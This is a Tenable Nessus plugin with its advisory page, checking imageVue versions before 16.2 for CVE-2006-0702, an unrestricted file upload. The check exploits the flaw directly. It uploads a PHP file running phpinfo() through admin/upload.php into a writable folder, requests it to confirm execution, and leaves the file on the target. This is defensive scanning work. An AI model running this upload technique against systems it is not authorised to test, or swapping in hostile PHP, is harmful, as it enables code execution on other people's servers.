imageVue < 16.2 admin/upload.php Unrestricted File Upload

🗓️ 03 Mar 2006 00:00:00 · Reported by Tenable · Type: nessus

The imageVue < 16.2 admin/upload.php allows unrestricted file upload

CVE
CVE-2006-0702
15 Feb 200611:00
cve
Cvelist
CVE-2006-0702
15 Feb 200611:00
cvelist
EUVD
EUVD-2006-0709
7 Oct 202500:30
euvd
NVD
CVE-2006-0702
15 Feb 200611:06
nvd
Prion
Directory traversal
15 Feb 200611:06
prion
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin metadata. This branch runs only when Nessus loads the plugin
# description; the actual check starts after the closing brace.
if (description)
{
  script_id(20991);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  # Public identifiers for the flaw this plugin detects.
  script_cve_id("CVE-2006-0702");
  script_bugtraq_id(16594);

  script_name(english:"imageVue < 16.2 admin/upload.php Unrestricted File Upload");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that allows arbitrary
uploads.");
  script_set_attribute(attribute:"description", value:
"The remote host is running imageVue, a web-based photo gallery
application written in PHP. 

The installed version of imageVue allows unauthenticated attackers to
upload arbitrary files, including files containing code that can then
be executed subject to the privileges of the web server user id. 

In addition, it is also reportedly affected by information disclosure
and cross-site scripting vulnerabilities, although Nessus has not
checked for those issues.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/424745/30/0/threaded");
  script_set_attribute(attribute:"solution", value:
"Upgrade to imageVue 16.2 or later.");
  # CVSSv2: network-reachable, low complexity, no authentication, partial C/I/A.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/02/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/03/03");

  # "thorough_tests" enables probing of additional guessed install directories.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # Destructive: the check writes a file to the target web server, so it is
  # only run when that category is enabled in the scan policy.
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");

  # Run after HTTP fingerprinting; skip when PHP is absent or CGI scanning is disabled.
  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");


# Target web port; bail out early when the server cannot serve PHP at all.
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Candidate install directories: the discovered CGI directories, plus a few
# common imageVue install names when thorough tests are enabled.
if (thorough_tests)
{
  dirs = list_uniq(make_list("/imagevue", "/imageVue", "/ImageVue", cgi_dirs()));
}
else
{
  dirs = make_list(cgi_dirs());
}

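foreach dir (dirs) {
  # Get a list of possible folders. dir.php answers with an XML document that
  # carries one <folder ...> start tag per gallery folder.
  w = http_send_recv3(method:"GET", item:string(dir, "/dir.php"), port:port);
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # If it looks like it's from ImageVue...
  if (
    '<?xml version="1.0"' >< res &&
    '<folder path="' >< res
  ) {
    # Find the first folder whose perm attribute starts with "7" (writable).
    # Reset per directory so a folder found for an earlier dir is never reused.
    folder = NULL;
    perm_pat = '^.+ path="([^"]+/)" .+ perm="7.+';
    while (res) {
      res = strstr(res, '<folder path="');
      if (!res) break;

      # Text of the current <folder ...> start tag, up to its closing ">".
      attr = res - strstr(res, ">");
      if (ereg(pattern:perm_pat, string:attr)) {
        folder = ereg_replace(pattern:perm_pat, replace:"\1", string:attr);
        break;
      }

      # Not writable: skip past this element and inspect the next one.
      # (Without this advance being reachable, only the first folder is ever
      # examined and an unmatched attribute string ends up used as the path.)
      res = strstr(res, ">") - ">";
    }

    # Try to upload a file.
    if (folder) {
      # Unique, random name so the probe cannot collide with existing content
      # and can be found in the server's logs/filesystem afterwards.
      file = string(rand_str(charset:"abcdefghijklmnopqrstuvwxyz0123456789_"), "-", unixtime(), ".php");

      bound = "nessus";
      boundary = string("--", bound);
      postdata = string(
        boundary, "\r\n",
        'Content-Disposition: form-data; name="uploadFile"; filename="', file, '"', "\r\n",
        "Content-Type: application/x-php\r\n",
        "\r\n",
        "<?php phpinfo() ?>\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="getpath"', "\r\n",
        "\r\n",
        "./../", folder, "\r\n",

        boundary, "--", "\r\n"
      );
      w = http_send_recv3(method: "POST",  port:port,
      	item: dir+"/admin/upload.php",
	content_type: "multipart/form-data; boundary="+bound,
	data: postdata);
      if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");

      # Finally, try to run the script we just uploaded.
      folder2 = urlencode(
         str:folder,
         unreserved:"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*'()-]/"
      );
      w = http_send_recv3(method:"GET", item:string(dir, "/", folder2, file), port:port);
      if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
      res = w[2];

      # There's a problem if it looks like the output of phpinfo().
      # NOTE: the probe file is not removed afterwards; it stays in the gallery
      # folder on the target until it is cleaned up by hand.
      if ("PHP Version" >< res) {
        security_hole(port);
      }
    }
  }
}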
